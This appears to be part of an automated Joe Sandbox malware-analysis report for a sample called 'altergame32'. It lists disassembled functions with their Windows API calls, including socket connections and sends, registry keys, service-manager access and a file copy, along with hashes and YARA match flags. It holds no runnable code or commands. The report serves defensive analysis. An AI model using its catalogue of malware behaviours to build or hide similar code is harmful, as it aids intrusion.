                                                                  • Opcode Fuzzy Hash: 354bc48a34f644291532efbc8da93efbed7fe71c52b13d9e56046722de9c0652
                                                                  • Instruction Fuzzy Hash: 02419DB09A43018FD7109F64E4547ABBBE9AF88358F109D1EFD9987280EFB4D540CB91
                                                                  Function 02E429EE Relevance: 7.6, APIs: 5, Instructions: 79networkCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 625 2e429ee-2e42a06 626 2e42ab3-2e42abb call 2e50b10 625->626 627 2e42a0c-2e42a10 625->627 636 2e42abe-2e42ac6 626->636 628 2e42a12-2e42a15 627->628 629 2e42a39-2e42a4c WSASetLastError closesocket call 2e4a508 627->629 628->629 631 2e42a17-2e42a36 call 2e50b10 call 2e42f50 628->631 635 2e42a51-2e42a55 629->635 631->629 635->626 638 2e42a57-2e42a5f call 2e50b10 635->638 643 2e42a61-2e42a67 638->643 644 2e42a69-2e42a71 call 2e50b10 638->644 643->644 645 2e42a7b-2e42aad ioctlsocket WSASetLastError closesocket call 2e4a508 643->645 649 2e42a73-2e42a79 644->649 650 2e42aaf-2e42ab1 644->650 645->650 649->645 649->650 650->626 650->636
                                                                  APIs
                                                                  • WSASetLastError.WS2_32(00000000), ref: 02E42A3B
                                                                  • closesocket.WS2_32 ref: 02E42A42
                                                                  • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02E42A89
                                                                  • WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 02E42A97
                                                                  • closesocket.WS2_32 ref: 02E42A9E
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLastclosesocket$ioctlsocket
                                                                  • String ID:
                                                                  • API String ID: 1561005644-0
                                                                  • Opcode ID: b3d578aaabf3050514f82be6c344f95c548ef5763ade341b5c4fd7801246841c
                                                                  • Instruction ID: 5da901e2e9e6080cf9746b3dd078fa3e24680020ba912e169cd5c999be35308d
                                                                  • Opcode Fuzzy Hash: b3d578aaabf3050514f82be6c344f95c548ef5763ade341b5c4fd7801246841c
                                                                  • Instruction Fuzzy Hash: 4D210B71A902059BDF209BB4E85876AB6E9DF4835DF10D96AFE55D3240EF70C9408B50
                                                                  Function 02E41BA7 Relevance: 7.6, APIs: 5, Instructions: 75COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 652 2e41ba7-2e41bcf call 2e653f0 RtlEnterCriticalSection 655 2e41bd1 652->655 656 2e41be9-2e41bf7 RtlLeaveCriticalSection call 2e4e32f 652->656 657 2e41bd4-2e41be0 call 2e41b79 655->657 659 2e41bfa-2e41c20 RtlEnterCriticalSection 656->659 664 2e41c55-2e41c6e RtlLeaveCriticalSection 657->664 665 2e41be2-2e41be7 657->665 661 2e41c34-2e41c36 659->661 662 2e41c22-2e41c2f call 2e41b79 661->662 663 2e41c38-2e41c43 661->663 666 2e41c45-2e41c4b 662->666 670 2e41c31 662->670 663->666 665->656 665->657 666->664 668 2e41c4d-2e41c51 666->668 668->664 670->661
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 02E41BAC
                                                                  • RtlEnterCriticalSection.NTDLL ref: 02E41BBC
                                                                  • RtlLeaveCriticalSection.NTDLL ref: 02E41BEA
                                                                  • RtlEnterCriticalSection.NTDLL ref: 02E41C13
                                                                  • RtlLeaveCriticalSection.NTDLL ref: 02E41C56
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$H_prolog
                                                                  • String ID:
                                                                  • API String ID: 1633115879-0
                                                                  • Opcode ID: 575682818664c34cd8b75004808096f8662de4218d50c5a61e774f2c20b6cba0
                                                                  • Instruction ID: 3c4efd2c1ed15bf4729e4587113ac45ea36a59240b85b957820255e3ef42459f
                                                                  • Opcode Fuzzy Hash: 575682818664c34cd8b75004808096f8662de4218d50c5a61e774f2c20b6cba0
                                                                  • Instruction Fuzzy Hash: 2A21A075A80204EFCF14CF68D84879ABBB5FF48718F109549E8599B301DB70E941CBA0
                                                                  Function 00403310 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetVersion.KERNEL32 ref: 00403336
                                                                    • Part of subcall function 00404454: HeapCreate.KERNEL32(00000000,00001000,00000000,0040336F,00000000), ref: 00404465
                                                                    • Part of subcall function 00404454: HeapDestroy.KERNEL32 ref: 004044A4
                                                                  • GetCommandLineA.KERNEL32 ref: 00403384
                                                                  • GetStartupInfoA.KERNEL32(?), ref: 004033AF
                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004033D2
                                                                    • Part of subcall function 0040342B: ExitProcess.KERNEL32 ref: 00403448
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                  • String ID:
                                                                  • API String ID: 2057626494-0
                                                                  • Opcode ID: b08ae2b8b777e4e577008e5565d37e94f80acee913e276c938b9cc00b58d7c54
                                                                  • Instruction ID: a936b3102d24e78b19d7c169988c3063d29dd1dd2c17feae02d4b7387c8d63d1
                                                                  • Opcode Fuzzy Hash: b08ae2b8b777e4e577008e5565d37e94f80acee913e276c938b9cc00b58d7c54
                                                                  • Instruction Fuzzy Hash: 172183B1900615AED704AFB5DE45A6E7F68EF44705F10413EF901B72D2DB385900CB58
                                                                  Function 02E42EDD Relevance: 6.0, APIs: 4, Instructions: 49networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WSASetLastError.WS2_32(00000000), ref: 02E42EEE
                                                                  • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02E42EFD
                                                                  • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02E42F0C
                                                                  • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02E42F36
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast$Socketsetsockopt
                                                                  • String ID:
                                                                  • API String ID: 2093263913-0
                                                                  • Opcode ID: 7156ce1f1fc5f519059e905a9798a81068a7e964b9575072ac599bda7587406e
                                                                  • Instruction ID: 53cf42dd36c6299561b3f32e4a6a9b1014dce7584b9f8e78ee9536360e40257e
                                                                  • Opcode Fuzzy Hash: 7156ce1f1fc5f519059e905a9798a81068a7e964b9575072ac599bda7587406e
                                                                  • Instruction Fuzzy Hash: 2A017971A90214BBDB205F66DC88B5BBBA9EB89765F40C555FA1897141D77088008B60
                                                                  Function 02E42DB5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 02E42D39: WSASetLastError.WS2_32(00000000), ref: 02E42D47
                                                                    • Part of subcall function 02E42D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02E42D5C
                                                                  • WSASetLastError.WS2_32(00000000), ref: 02E42E6D
                                                                  • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02E42E83
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast$Sendselect
                                                                  • String ID: 3'
                                                                  • API String ID: 2958345159-280543908
                                                                  • Opcode ID: 8261cbbd7e040e383fc85891d69d244b462be1b5858815362a1b4d8c87167ec0
                                                                  • Instruction ID: e27e34d7a11c1a31cc0417359ac6d269eced3456e44a91ff8ed1bef668766332
                                                                  • Opcode Fuzzy Hash: 8261cbbd7e040e383fc85891d69d244b462be1b5858815362a1b4d8c87167ec0
                                                                  • Instruction Fuzzy Hash: 3F31E4B0EA02199FDF11DF60E8547EE7BA5AF09358F00D45AFD0497240EBB19580CFA0
                                                                  Function 02E42AC7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WSASetLastError.WS2_32(00000000), ref: 02E42AEA
                                                                  • connect.WS2_32(?,?,?), ref: 02E42AF5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLastconnect
                                                                  • String ID: 3'
                                                                  • API String ID: 374722065-280543908
                                                                  • Opcode ID: 79f10b14e9f6b16635b7ee535041d6cfe29311dbd3a3d63bbeccb9f8f0f76bd4
                                                                  • Instruction ID: d4bab5aca922006761b765ecdc541f93dc0749b69aead70431f279441cd5076d
                                                                  • Opcode Fuzzy Hash: 79f10b14e9f6b16635b7ee535041d6cfe29311dbd3a3d63bbeccb9f8f0f76bd4
                                                                  • Instruction Fuzzy Hash: C921AA70E502145BCF14AF74E4646AEBBBADF44368F10D599FD1897280EFB455018F91
                                                                  Function 0040264E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70sleeplibraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProcSleep
                                                                  • String ID: B:%
                                                                  • API String ID: 1175476452-921457382
                                                                  • Opcode ID: 23616e709f3a8f92ee577e4f06470e49853b31bb415dd92b2dc5cf32625e53e4
                                                                  • Instruction ID: 5de13a12f4540e4fd9c75831dffb799ae9cb131bfc725f57e4845645b6027e56
                                                                  • Opcode Fuzzy Hash: 23616e709f3a8f92ee577e4f06470e49853b31bb415dd92b2dc5cf32625e53e4
                                                                  • Instruction Fuzzy Hash: 0B110631A08201DFDB00CF68CA99BAA3BA0AF04354F14412BF956EB2D0C374DA46DB5A
                                                                  Function 00402556 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegCreateKeyExA.KERNEL32(80000002,Software\ATour), ref: 00402561
                                                                  • SetEvent.KERNEL32 ref: 00402AE0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: CreateEvent
                                                                  • String ID: Software\ATour
                                                                  • API String ID: 2692171526-3083386596
                                                                  • Opcode ID: f186dd0b7bc98dd43764a25f86a4cb0d0e809b4a92060d8c1256fdb064220542
                                                                  • Instruction ID: 97827390f0dbf811a8766feaa4b3b3f1fe6a4e1045c6de9f8130f5e784142085
                                                                  • Opcode Fuzzy Hash: f186dd0b7bc98dd43764a25f86a4cb0d0e809b4a92060d8c1256fdb064220542
                                                                  • Instruction Fuzzy Hash: BD117635E052829BD3105B30FF61BE27BB9A746760F04027EC996B72A2C3788C46E65C
                                                                  Function 00402723 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OpenSCManagerA.ADVAPI32(?,?,00000002), ref: 0040D7B5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: ManagerOpen
                                                                  • String ID: \$sqlite3.dll
                                                                  • API String ID: 1889721586-2821398869
                                                                  • Opcode ID: 520e348fbed41caa7d91e0eeccad9f0cf03247776b24ec716f8ec42433566651
                                                                  • Instruction ID: 02cac2386a51af119043485a38359376ff8e08f267ee505fb347487170b15741
                                                                  • Opcode Fuzzy Hash: 520e348fbed41caa7d91e0eeccad9f0cf03247776b24ec716f8ec42433566651
                                                                  • Instruction Fuzzy Hash: AE116F71C08656DADB085BF45EA65FA3FA09701320F2045BFC557B12E1C13C4A09D72E
                                                                  Function 02E4353E Relevance: 4.6, APIs: 3, Instructions: 127COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: e005e631adcad1577092bc4db21f8fc0502daccfd31109ffa44fa2af9c9c872a
                                                                  • Instruction ID: bc160ffbaa80b8f197a4ea664d8518830416ad7b21d913ba57212c39b7a45849
                                                                  • Opcode Fuzzy Hash: e005e631adcad1577092bc4db21f8fc0502daccfd31109ffa44fa2af9c9c872a
                                                                  • Instruction Fuzzy Hash: BF514F71A45216DFCB08DF68D4506AABBB1FF08324F20D19EF8299B380DB749910CFA0
                                                                  Function 02E4369A Relevance: 4.6, APIs: 3, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InterlockedIncrement.KERNEL32(?), ref: 02E436A7
                                                                    • Part of subcall function 02E42420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02E42432
                                                                    • Part of subcall function 02E42420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02E42445
                                                                    • Part of subcall function 02E42420: RtlEnterCriticalSection.NTDLL(?), ref: 02E42454
                                                                    • Part of subcall function 02E42420: InterlockedExchange.KERNEL32(?,00000001), ref: 02E42469
                                                                    • Part of subcall function 02E42420: RtlLeaveCriticalSection.NTDLL(?), ref: 02E42470
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                  • String ID:
                                                                  • API String ID: 1601054111-0
                                                                  • Opcode ID: d211e34b6d139ab72ac64cc5d493fafcb3ca20d92fa503e8bf2d7bd4044a55e2
                                                                  • Instruction ID: 4cbbb66d55d6996949d9e3b32e898ef0eb67352b96c8076d8e835487f90e34f4
                                                                  • Opcode Fuzzy Hash: d211e34b6d139ab72ac64cc5d493fafcb3ca20d92fa503e8bf2d7bd4044a55e2
                                                                  • Instruction Fuzzy Hash: 2011C4B5180209ABDF218E14EC49FAB3B65EF40368F209456FE56C6290CF74D860CBA4
                                                                  Function 02E520F0 Relevance: 4.5, APIs: 3, Instructions: 42threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __beginthreadex.LIBCMT ref: 02E52106
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000002,02E4A988,00000000), ref: 02E52137
                                                                  • ResumeThread.KERNEL32(?,?,?,?,?,00000002,02E4A988,00000000), ref: 02E52145
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseHandleResumeThread__beginthreadex
                                                                  • String ID:
                                                                  • API String ID: 1685284544-0
                                                                  • Opcode ID: 2f3d3042339cd3ef1e2adb74820c335abed5c67aa5c95d1b3011e2eacd4af4bf
                                                                  • Instruction ID: 16fde02529d23301ce0c9bcd8672aaaf5cfe3f3317db516ad803887f2d34e807
                                                                  • Opcode Fuzzy Hash: 2f3d3042339cd3ef1e2adb74820c335abed5c67aa5c95d1b3011e2eacd4af4bf
                                                                  • Instruction Fuzzy Hash: A7F0C8702902105BE7209E59DC84F96B3D8EF48368F14855AFB54C7281C771A8929AA0
                                                                  Function 02E41AA9 Relevance: 4.5, APIs: 3, Instructions: 18networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InterlockedIncrement.KERNEL32(02E772B4), ref: 02E41ABA
                                                                  • WSAStartup.WS2_32(00000002,00000000), ref: 02E41ACB
                                                                  • InterlockedExchange.KERNEL32(02E772B8,00000000), ref: 02E41AD7
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Interlocked$ExchangeIncrementStartup
                                                                  • String ID:
                                                                  • API String ID: 1856147945-0
                                                                  • Opcode ID: cb47f5d46b9b289c51cb49a74b59baeca83a5b3465e0bcd4ddb93991c678d31d
                                                                  • Instruction ID: d4bb6e9801f7c80ad273a4db53f32670dfcceae1a02bb21d050913b92b528793
                                                                  • Opcode Fuzzy Hash: cb47f5d46b9b289c51cb49a74b59baeca83a5b3465e0bcd4ddb93991c678d31d
                                                                  • Instruction Fuzzy Hash: A0D05E719D42145BE61066A5AC0EA7AFB2CE705669F801656FC7EC00C0EA50596095B6
                                                                  Function 00402947 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID: Eshenc43
                                                                  • API String ID: 3535843008-4181249012
                                                                  • Opcode ID: 15ef28204f07d7b48703b89e2d6c5d33e29141c309989999f2207bc0bfe5d7bc
                                                                  • Instruction ID: be004e59aa3699ca12022b62cae7feaba2be92beb7ca5540e0a9a012bdacf4b0
                                                                  • Opcode Fuzzy Hash: 15ef28204f07d7b48703b89e2d6c5d33e29141c309989999f2207bc0bfe5d7bc
                                                                  • Instruction Fuzzy Hash: 76F027325087425ADF120BB40A696D47BB1AB42300B24247FD4D2711E3C3BC4513E71E
                                                                  Function 00402CCE Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID: EShineEncoder
                                                                  • API String ID: 3535843008-1597600474
                                                                  • Opcode ID: 5b41531665007a81d217991c6893f759ccf1358bb147f584ce279fc5a91da054
                                                                  • Instruction ID: 012348b20830d107378ed8136720504f13b5e39aecd52ebec1987391a0c9276e
                                                                  • Opcode Fuzzy Hash: 5b41531665007a81d217991c6893f759ccf1358bb147f584ce279fc5a91da054
                                                                  • Instruction Fuzzy Hash: 30D0EC71C48200EAC7411EF04D0957A7925BF09344735457BA003B91E5CABA490BD71E
                                                                  Function 00402285 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 12registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegOpenKeyExA.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders), ref: 0040DC62
                                                                  Strings
                                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040D5E5
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: Open
                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                  • API String ID: 71445658-2036018995
                                                                  • Opcode ID: 3bf725d415e05b0408b9a947ea3942c27790e6a72a6ab1259dd2e36986a1b2c9
                                                                  • Instruction ID: 46e6dc69ee420d112a3caf2eee0461ed8c1b04e216817f0ca4a34adcfc96ca13
                                                                  • Opcode Fuzzy Hash: 3bf725d415e05b0408b9a947ea3942c27790e6a72a6ab1259dd2e36986a1b2c9
                                                                  • Instruction Fuzzy Hash: 5FC00250A08216DAE74466A14E5DA7672586710748F2045379D07B01D1E67C550BF51E
                                                                  Function 02E44BED Relevance: 3.1, APIs: 2, Instructions: 137COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 02E44BF2
                                                                    • Part of subcall function 02E41BA7: __EH_prolog.LIBCMT ref: 02E41BAC
                                                                    • Part of subcall function 02E41BA7: RtlEnterCriticalSection.NTDLL ref: 02E41BBC
                                                                    • Part of subcall function 02E41BA7: RtlLeaveCriticalSection.NTDLL ref: 02E41BEA
                                                                    • Part of subcall function 02E41BA7: RtlEnterCriticalSection.NTDLL ref: 02E41C13
                                                                    • Part of subcall function 02E41BA7: RtlLeaveCriticalSection.NTDLL ref: 02E41C56
                                                                    • Part of subcall function 02E4E0F7: __EH_prolog.LIBCMT ref: 02E4E0FC
                                                                    • Part of subcall function 02E4E0F7: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02E4E17B
                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 02E44CF2
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                  • String ID:
                                                                  • API String ID: 1927618982-0
                                                                  • Opcode ID: c10775b474d162bc695c1b684a261532a9239c023b19c367ed9f294ad9318bf2
                                                                  • Instruction ID: 8a815f407cd0b79850398083d48818f47a55701cf5549f813e40edc3878adb46
                                                                  • Opcode Fuzzy Hash: c10775b474d162bc695c1b684a261532a9239c023b19c367ed9f294ad9318bf2
                                                                  • Instruction Fuzzy Hash: 72515771E44248DFDB05DFA8D884AEEBBB5FF09314F14915AE905AB391DB309A44CF60
                                                                  Function 02E42D39 Relevance: 3.0, APIs: 2, Instructions: 50networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WSASetLastError.WS2_32(00000000), ref: 02E42D47
                                                                  • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02E42D5C
                                                                    • Part of subcall function 02E4A508: WSAGetLastError.WS2_32(00000000,?,?,02E42A51), ref: 02E4A516
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLast$Send
                                                                  • String ID:
                                                                  • API String ID: 1282938840-0
                                                                  • Opcode ID: 2e341244993b856edfbed5ed4c470c2b7ab3d1a9415373cc18fe04d61edddcd8
                                                                  • Instruction ID: 333a791e784525ef3cf53cb2806d213f769eeaca6631e986740c8618e1313bf1
                                                                  • Opcode Fuzzy Hash: 2e341244993b856edfbed5ed4c470c2b7ab3d1a9415373cc18fe04d61edddcd8
                                                                  • Instruction Fuzzy Hash: CC01D8B1540209AFD7205F55D89486BBBECFF493A8B10852EFD5983200EF708D00CB61
                                                                  Function 0040D0F2 Relevance: 3.0, APIs: 2, Instructions: 34fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CopyFileA.KERNEL32 ref: 0040D0F2
                                                                  • OpenSCManagerA.ADVAPI32(?,?,00000002), ref: 0040D7B5
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.000000000040B000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_400000_altergame32.jbxd
                                                                  Similarity
                                                                  • API ID: CopyFileManagerOpen
                                                                  • String ID:
                                                                  • API String ID: 3059512871-0
                                                                  • Opcode ID: 9e3146827b823fb72847a81831b6f9f609e1ae4ab21fb75e0122e33f8468bf4c
                                                                  • Instruction ID: 63a47c692e634ecde8090716e013d1652f7ed24adeb4c2df2f38a42cb0036bbc
                                                                  • Opcode Fuzzy Hash: 9e3146827b823fb72847a81831b6f9f609e1ae4ab21fb75e0122e33f8468bf4c
                                                                  • Instruction Fuzzy Hash: 2AF090768052929AEB085B71BFB65E67FA4D702331B00027AD693B12F2D27C4A45D729
                                                                  Function 02E483E9 Relevance: 3.0, APIs: 2, Instructions: 32networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WSASetLastError.WS2_32(00000000), ref: 02E48406
                                                                  • shutdown.WS2_32(?,00000002), ref: 02E4840F
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E41000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_2e41000_altergame32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLastshutdown
                                                                  • String ID:
                                                                  • API String ID: 1920494066-0
                                                                  • Opcode ID: d37623be7d9e36bcb236ed0f93714b3c7ede0664a344a167b62e83d00ea6504d
                                                                  • Instruction ID: a85932f67b2634e44acb0159abf075ee7c557ba4499e9ca6fca572bd7ad1ba6a
                                                                  • Opcode Fuzzy Hash: d37623be7d9e36bcb236ed0f93714b3c7ede0664a344a167b62e83d00ea6504d
                                                                  • Instruction Fuzzy Hash: D5F090716943148FC710AF14E824B5AB7E5FF08369F40881CFD9997380DB70AC10CBA1
                                                                  Function 00404454 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • HeapCreate.KERNEL32(00000000,00001000,00000000,0040336F,00000000), ref: 00404465
                                                                    • Part of subcall function 0040430C: GetVersionExA.KERNEL32 ref: 0040432B
                                                                  • HeapDestroy.KERNEL32 ref: 004044A4
                                                                    • Part of subcall function 0040482B: HeapAlloc.KERNEL32(00000000,00000140,0040448D,000003F8), ref: 00404838
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.3047502671.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
